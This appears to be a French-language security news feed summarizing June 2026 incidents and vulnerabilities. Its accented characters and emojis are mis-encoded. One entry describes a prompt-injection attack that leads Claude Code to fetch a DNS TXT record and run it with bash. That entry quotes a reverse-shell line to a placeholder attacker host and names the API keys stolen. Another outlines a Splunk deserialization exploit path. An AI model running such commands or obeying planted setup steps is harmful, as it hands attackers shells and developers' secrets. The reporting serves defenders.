Attaque ransomware contre River Financial Corporation et River Bank & Trust

🏩 Contexte Source : dĂ©pĂŽt SEC (EDGAR), publiĂ© le 26 juin 2026. River Financial Corporation, incluant sa filiale River Bank & Trust, a notifiĂ© la SEC d’un incident de cybersĂ©curitĂ© survenu mi-juin 2026. 🔓 DĂ©roulement de l’incident Vers le 16 juin 2026 : un acteur malveillant non identifiĂ© obtient un accĂšs non autorisĂ© Ă  l’environnement rĂ©seau de River Financial Corporation. Vers le 19 juin 2026 : River identifie l’activitĂ© malveillante. Un ransomware est dĂ©ployĂ© sur des portions de l’environnement serveur. đŸ›Ąïž Mesures de confinement DĂ©sactivation des comptes administratifs compromis. Mise hors ligne des systĂšmes impactĂ©s. 🔍 Investigation en cours River, assistĂ©e d’un cabinet forensique tiers, mĂšne une investigation pour dĂ©terminer la nature et l’étendue de l’incident, notamment si des donnĂ©es personnelles identifiables (PII) ont Ă©tĂ© accĂ©dĂ©es ou exfiltrĂ©es. L’enquĂȘte est toujours en cours au moment de la publication. ...

29 juin 2026 Â· 2 min

Cellebrite utilisé par les autorités russes pour réprimer l'activiste Andrey Pivovarov

🔍 Contexte PubliĂ© le 25 juin 2026 par le Citizen Lab (UniversitĂ© de Toronto), ce rapport prĂ©sente une analyse forensique dĂ©taillĂ©e de l’utilisation de l’outil Cellebrite UFED par les autoritĂ©s russes contre l’activiste politique Andrey Pivovarov, ancien directeur de l’ONG Open Russia. đŸ“± Incident principal Le 31 mai 2021, Pivovarov est arrĂȘtĂ© Ă  l’aĂ©roport de Saint-PĂ©tersbourg. Ses appareils (iPhone 12 et MacBook) sont confisquĂ©s. L’analyse forensique rĂ©vĂšle avec haute confiance que Cellebrite UFED a Ă©tĂ© utilisĂ© le 17 juin 2021 pour extraire les donnĂ©es de son iPhone, via une connexion USB identifiĂ©e par un Host ID Cellebrite (9016926980658937761372207). ...

29 juin 2026 Â· 3 min

CVE-2026-20251 : RCE via désérialisation jsonpickle dans Splunk Secure Gateway (CVSS 8.8)

🔍 Contexte PubliĂ© le 29 juin 2026 sur GitHub par le chercheur Fady Oueslati (ReactiveZero Security Research), ce dĂ©pĂŽt documente la vulnĂ©rabilitĂ© CVE-2026-20251 affectant Splunk Secure Gateway (SSG), avec un score CVSS 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). Un patch est disponible. 🐛 VulnĂ©rabilitĂ© La faille repose sur une dĂ©sĂ©rialisation non sĂ©curisĂ©e via jsonpickle dans le composant SSG. Le flux d’exploitation est le suivant : Un attaquant authentifiĂ© (faibles privilĂšges) Ă©crit un document malveillant dans la collection KV Store mobile_alerts via l’API REST Splunk. SSG lit ce document dans alerts_request_processor.py et le soumet au validateur check_alert_data_valid_json(). Le validateur court-circuite dĂšs qu’il rencontre la clĂ© py/object avec une valeur commençant par spacebridgeapp, retournant True sans inspecter les clĂ©s suivantes. Le document est ensuite passĂ© Ă  jsonpickle.decode(..., safe=True), qui exĂ©cute le gadget py/reduce prĂ©sent dans la clĂ© notification — le flag safe=True ne bloque pas ce chemin de code. 🎯 Impact ExĂ©cution de code arbitraire en tant que compte de service Splunk NĂ©cessite uniquement un login Splunk valide Ă  faibles privilĂšges ConfidentialitĂ©, intĂ©gritĂ© et disponibilitĂ© toutes compromises 📩 Versions affectĂ©es Branche CorrigĂ© dans SSG 3.9.x 3.9.20 SSG 3.10.x 3.10.6 SSG 3.8.x 3.8.67 Splunk Enterprise 10.0.7 / 10.2.4 / 10.4.0+ Instance testĂ©e : SSG 3.9.19 sur Splunk Enterprise 10.0.6 (macOS x86_64). ...

29 juin 2026 Â· 2 min

CVE-2026-46331 ' pedit COW ' : élévation de privilÚges root dans le noyau Linux

🔍 Contexte Source : The Hacker News, publiĂ©e le 26 juin 2026. L’article rapporte la dĂ©couverte et la divulgation publique d’une vulnĂ©rabilitĂ© critique dans le noyau Linux, identifiĂ©e sous le nom CVE-2026-46331 et surnommĂ©e « pedit COW ». 🐛 VulnĂ©rabilitĂ© Type : Écriture hors limites (out-of-bounds write) Composant affectĂ© : Sous-systĂšme de contrĂŽle du trafic rĂ©seau du noyau Linux, spĂ©cifiquement le module d’action d’édition de paquets (act_pedit) MĂ©canisme : La faille corrompt la mĂ©moire partagĂ©e du cache de pages (shared page-cache memory) Impact : ÉlĂ©vation de privilĂšges locale — un utilisateur non privilĂ©giĂ© peut obtenir les droits root sur les systĂšmes affectĂ©s ⚡ Exploitation Un exploit public fonctionnel a Ă©tĂ© publiĂ© dans la journĂ©e suivant l’attribution du CVE, soit le 16 juin 2026 La rapiditĂ© de publication de l’exploit augmente significativement le risque d’exploitation active 🏱 Évaluation des Ă©diteurs Red Hat a attribuĂ© une sĂ©vĂ©ritĂ© Ă  cette vulnĂ©rabilitĂ© (le niveau exact n’est pas prĂ©cisĂ© dans l’extrait disponible) 📌 Type d’article Article de presse spĂ©cialisĂ©e signalant une vulnĂ©rabilitĂ© noyau Linux avec exploit public disponible, destinĂ© Ă  informer les Ă©quipes de sĂ©curitĂ© et les administrateurs systĂšmes Linux. ...

29 juin 2026 Â· 2 min

Deux membres de Scattered Spider condamnés pour l'attaque contre Transport for London

đŸ›ïž Contexte Le 22 juin 2026, la National Crime Agency (NCA) britannique a annoncĂ© la condamnation de deux cybercriminels ayant attaquĂ© le rĂ©seau informatique de Transport for London (TfL). L’article est publiĂ© sur le site officiel de la NCA. đŸ‘€ Acteurs identifiĂ©s Thalha Jubair, 20 ans, originaire de l’Est de Londres Owen Flowers, 18 ans, originaire de Walsall, West Midlands Tous deux membres du collectif criminel en ligne Scattered Spider đŸ—“ïž Chronologie 31 aoĂ»t – 3 septembre 2024 : infiltration du rĂ©seau de TfL 6 septembre 2024 : premiĂšre arrestation de Flowers pour l’attaque TfL 16 septembre 2024 : arrestation des deux individus Ă  leur domicile par la NCA et la City of London Police (COLP) Mars et mai 2025 : Flowers viole ses conditions de libertĂ© sous caution Ă  deux reprises 22 juin 2026 : les deux accusĂ©s plaident coupable au Woolwich Crown Court 16 juillet : date prĂ©vue pour le prononcĂ© de la peine đŸ’„ Impact de l’attaque 29 millions de livres sterling de pertes et coĂ»ts de rĂ©cupĂ©ration pour TfL Les 28 000 employĂ©s de TfL ont dĂ» se rendre physiquement dans un bureau pour rĂ©initialiser leur mot de passe AccĂšs aux donnĂ©es du systĂšme de remboursements Oyster Perturbation du systĂšme de remboursement clients Fermeture du systĂšme de demande de photocards Oyster pour enfants et jeunes đŸ„ Victimes supplĂ©mentaires Lors de l’arrestation de Flowers, des preuves ont Ă©tĂ© trouvĂ©es indiquant l’infiltration et l’endommagement des rĂ©seaux de deux entreprises amĂ©ricaines de santĂ© : ...

29 juin 2026 Â· 3 min

DirtyClone (CVE-2026-43503) : LPE Linux via corruption du page cache par IPsec

🔍 Contexte PubliĂ© le 25 juin 2026 par les chercheurs Eddy Tsalolikhin et Or Peles de JFrog Security Research, cet article prĂ©sente une analyse technique approfondie de DirtyClone, une nouvelle variante de la famille de vulnĂ©rabilitĂ©s DirtyFrag affectant le noyau Linux. La vulnĂ©rabilitĂ© est rĂ©fĂ©rencĂ©e CVE-2026-43503 (CVSS 8.8, sĂ©vĂ©ritĂ© haute). 🧬 Famille de vulnĂ©rabilitĂ©s DirtyFrag DirtyFrag est une famille de vulnĂ©rabilitĂ©s de corruption mĂ©moire dans la pile rĂ©seau du noyau Linux, exploitant l’intersection entre : ...

29 juin 2026 Â· 3 min

FortiBleed : infrastructure d'un courtier d'accĂšs initial ciblant Fortinet, Synology, Sophos et MSSQL

🔍 Contexte PubliĂ© le 19 juin 2026 par SpyCloud Labs, cet article prĂ©sente une analyse technique approfondie de l’infrastructure opĂ©rationnelle du groupe Ă  l’origine du dataset « FortiBleed », initialement dĂ©couvert par le chercheur Volodymyr « Bob » Diachenko. SpyCloud a obtenu une copie des donnĂ©es et les a analysĂ©es contre son schĂ©ma de brĂšches. 🎯 Nature de la campagne La campagne, active depuis le 19 mai 2026, est opĂ©rĂ©e par un courtier d’accĂšs initial (IAB) russophone utilisant des techniques de mass-scanning et brute-force (spray-and-pray) contre des Ă©quipements exposĂ©s sur Internet : ...

29 juin 2026 Â· 4 min

Injection de prompt indirecte via DNS TXT : compromission totale via Claude Code à l'ouverture d'un dépÎt

🔍 Contexte PubliĂ© le 25 juin 2026 par Andre Hall & Miller Engelbrecht sur le blog de 0DIN (plateforme de bug bounty IA de Mozilla), cet article prĂ©sente une dĂ©monstration technique d’une attaque par injection de prompt indirecte ciblant les outils de dĂ©veloppement agentiques, en particulier Claude Code d’Anthropic. ⚙ MĂ©canisme de l’attaque L’attaque repose sur trois composants enchaĂźnĂ©s, chacun individuellement bĂ©nin : Un dĂ©pĂŽt GitHub normal : un fichier README ou issue dĂ©crit une procĂ©dure d’initialisation standard (pip3 install -r requirements.txt puis python3 -m axiom init). Un package Python qui Ă©choue intentionnellement : le module axiom lĂšve une RuntimeError s’il n’est pas initialisĂ©, incitant l’agent Ă  exĂ©cuter python3 -m axiom init comme correction de routine. Un script d’initialisation qui rĂ©sout un enregistrement DNS TXT : scripts/setup.sh exĂ©cute dig +short TXT _axiom-config.m100.cloud @1.1.1.1 et passe le rĂ©sultat Ă  bash -c. L’enregistrement DNS contient un reverse shell encodĂ© en base64 (bash -i >& /dev/tcp/<attacker-host>/4443 0>&1). đŸ’„ Impact Shell interactif s’exĂ©cutant avec les droits de l’utilisateur dĂ©veloppeur Exfiltration de secrets d’environnement : ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN PossibilitĂ© de persistance (clĂ© SSH, cron job, backdoor) Le payload est invisible : absent du dĂ©pĂŽt, non dĂ©tectable par les scanners statiques, jamais Ă©valuĂ© par l’agent avant exĂ©cution Le payload peut ĂȘtre modifiĂ© Ă  tout moment en Ă©ditant l’enregistrement DNS, sans aucun commit 🎯 Vecteur de diffusion Un simple lien vers le dĂ©pĂŽt partagĂ© dans une offre d’emploi, un tutoriel ou un message Slack suffit Ă  compromettre tout dĂ©veloppeur ouvrant le projet avec Claude Code. ...

29 juin 2026 Â· 3 min

KDDI : violation de données exposant jusqu'à 14,2 millions de comptes email au Japon

📰 Source : BleepingComputer — Date de publication : 28 juin 2026 Contexte KDDI Corporation, l’un des plus grands opĂ©rateurs tĂ©lĂ©com japonais (45 000 employĂ©s, 32,4 milliards USD de revenus annuels), a divulguĂ© une violation de donnĂ©es affectant un systĂšme email centralisĂ© utilisĂ© par cinq fournisseurs d’accĂšs Ă  Internet (FAI) partenaires. DĂ©roulement de l’incident La compromission a Ă©tĂ© dĂ©couverte le 17 juin par KDDI. Les attaquants ont exploitĂ© une vulnĂ©rabilitĂ© dans un logiciel tiers non nommĂ© dĂ©ployĂ© sur le systĂšme KDDI. KDDI a immĂ©diatement bloquĂ© l’accĂšs non autorisĂ© et mis en place des mesures dĂ©fensives. Les autoritĂ©s compĂ©tentes ont Ă©tĂ© notifiĂ©es : Personal Information Protection Commission et Ministry of Internal Affairs and Communications. PĂ©rimĂštre d’impact Les cinq FAI affectĂ©s sont : ...

29 juin 2026 Â· 2 min

KHAOS C2 : nouveau framework post-exploitation avec 5 canaux furtifs et évasion complÚte

🔍 Contexte PubliĂ© le 29 juin 2026 sur GitHub par l’utilisateur 28Zaaky, le dĂ©pĂŽt khaos-c2 prĂ©sente KHAØS, un framework de command-and-control (C2) post-exploitation open-source sous licence MIT. Le projet compte 109 Ă©toiles et 19 forks au moment de la publication. Le code est principalement Ă©crit en C (91,6%), avec des composants JavaScript, Python et PowerShell. 🎯 Description du framework KHAØS est conçu pour contourner les solutions EDR en s’appuyant sur plusieurs mĂ©canismes d’évasion : ...

29 juin 2026 Â· 4 min
Derniùre mise à jour le: 9 juillet 2026 📝